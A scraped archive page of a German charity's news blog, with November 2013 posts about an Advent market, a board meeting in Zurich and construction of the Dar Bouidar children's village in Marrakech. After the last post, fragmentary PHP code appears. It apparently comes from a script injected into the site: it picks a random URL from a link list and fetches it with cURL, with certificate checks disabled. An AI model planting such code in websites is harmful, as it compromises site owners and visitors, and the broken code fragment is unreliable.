News

Archive for November, 2013

Adventsmarkt am kommenden Wochenende am Pfalzm..

[ Samstag, 30. November 2013 ]  Am kommenden Wochenende, 7. und 8. Dezember, veranstaltet das Casino am Pfalzmarkt in Mutterstadt, einen kleinen exclusiven Adventsmarkt. Herr Schleicher, Gastronom und Organisator verspricht viele kleine , exclusive Stände mit ausgewählten Produkten.
Der Stand unserer Stiftung wird von den Azubis des Pfalzmarktes organisiert, hier gibt es einen besonderen Dornfelder Glühwein vom Weingut Pfaffmann in Impflingen, feine Aachener Printen und Spekulatius, sowie Accessoires aus Marokko.
Der Erlös geht zu Gunsten des Kinderdorfes  Dar Bouidar.
Kommen Sie vorbei uns lassen Sie sich überraschen!

Posted in: News

Leave a Comment (0) →

Jahrestagung der Fonation in Zürich……

[ Samstag, 23. November 2013 ] Am 1.November fand in Zürich die Jahrestagung der Fondation les enfants Dar Bouidar und gleichzeitig die Vorstandssitzung des schweizer Vereins statt.
Für den Vorstand des schweizer Vereins waren anwesend: Dr. Marc Schaetzle, Joya Schaetzle, Hansjörg Huber, Jeanette Stuker, Philppe Stuker sowie Frau Brida von Castelberg als neues Vorstandsmitglied und als Gast, Raimund Theobald von der deutschen Stiftung e.V..
Marc Schaetzle informierte die Vorstandsmitglieder über das vergangene Geschäftsjahr, sowie die den Mitgliederstand und die Aktivitäten  des Vereins. Frau Brida von Castelberg wurde als neues Vorstandsmitglied bestätigt und informierte im Anschluß über den aktuellen Stand Ihres Engagements bezüglich der Sanitätswagen und der Krankenstation im Kinderdorf.
Der Bericht über die Fondation in Marrakech wurde von Hansjörg Huber vorgetragen. Der Termin für die Einweihung des Kinderdorfes wird wie geplant Oktober 2014 sein. Die Gründung weiterer Vereine sowie künftige  Aktivitäten wurden besprochen und geplant.
Ferner wurden die Mitglieder im Stiftungsrat der Fondation Dar Bouidar in Marrakech, Dr. Marc Schaetzle, Raimund Theobald und Burgl Czeitschner bestätigt.

Die Neue Zürcher Zeitung hat einen Bericht über den Bauherr und Investor des Kinderdorfes Dar Bouidar veröffentlicht:

Bitte anklicken

NZZ_Nov_15_13

Posted in: News

Leave a Comment (0) →

Pfalzmarkt – Casino Chef, neuer Förderer und Unterstü….

[ Samstag, 16. November 2013 ] Jürgen Schleicher, Chef und Koch vom Pfalzmarkt Casino hat uns die Gelegenheit gegeben in einer Vitrine im Restaurant unser Kinderdorf und marokkanische Produkte zu präsentieren. Auch auf den von ihm geplanten Adventsmarkt am 7. und 8. Dezember werden wir Glühwein und Flammkuchen zu Gunsten des Kinderdorfes verkaufen.
Wir sind Herr Scheicher für sein Engagement  und seine Unterstützung sehr dankbar.

 

Posted in: News

Leave a Comment (0) →

Neuigkeiten von der Baustelle……

[ Samstag, 9. November 2013 ] An der Baustelle geht es zügig voran, die einheimischen Bauarbeiter sind sehr Stolz auf  ihr Kinderdorf, dass schließlich von ihnen gebaut wird. Die Planungen für Installationen und den Ausbau des Areals sind in vollem Gange.
Der Laden in einem der Eingangstürme wird demnächst eröffnet, hier kann man Accessoires und marokkanische Produkte zu Gunsten des Kinderdorfs kaufen. Ein ganz besondere Einrichtung ist die Galerie, hier stellen Künstler aus Marokko ihre Kunstwerke aus die zu Gunsten des Kinderdorfes erworben werden können.
Es läuft alles wie geplant, so dass die Einweihung im Herbst 2014 stattfinden kann.

IMG_7134IMG_7152IMG_7154IMG_7137

…weiter Bilder in der Fotogalerie…

Posted in: News

Leave a Comment (0) →

Die Idee war ursprünglich eine andere….

[ Samstag, 2. November 2013 ] Eine Stiftung für die Kinder von Dar Bouidar zu gründen war ursprünglich nicht angedacht. Durch einen Artikel in der Rivierazeitung von Prof. Dr. Kilchenmann aus Nizza  sind wir auf dieses Projekt aufmerksam geworden. Wir wollten uns lediglich  informieren ob wir für vier Wochen und dass eventuell jedes Jahr, in Marokko in einem Kinderdorf arbeiten können, Karin als Kinderbetreuerin und ich im landwirtschaftlichen Bereich.
Es kam  jedoch anders als wir den Präsidenten des schweizer Vereins „Les enfant Dar Bouidar“, Dr. Marc Schaetzle kennenlernten, der uns wiederum mit Hansjörg Huber dem Bauherren und Investor des sich im Bau befindlichen Kinderdorfes in Marrakech bekanntmachte.
So kam es, dass wir im April dieses Jahres nach Marrakech reisten und das Projekt sowie die Menschen die daran arbeiten kennenlernen durften.
Nach schweizer Muster sollen  in europäischen Ländern Vereine und Stiftungen entstehen, die eine langfristige Unterhaltung und den Betrieb des Kinderdorfes gewährleisten.
So gründeten wir im Sommer dieses Jahres  die deutsche Stiftung für die Kinder von Dar Bouidar e.V.  und hoffen nun in Deutschland möglichst viele Menschen zu finden die unser Projekt unterstützen.

 

Posted in: News

Leave a Comment (0) →
html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($ņ); ?>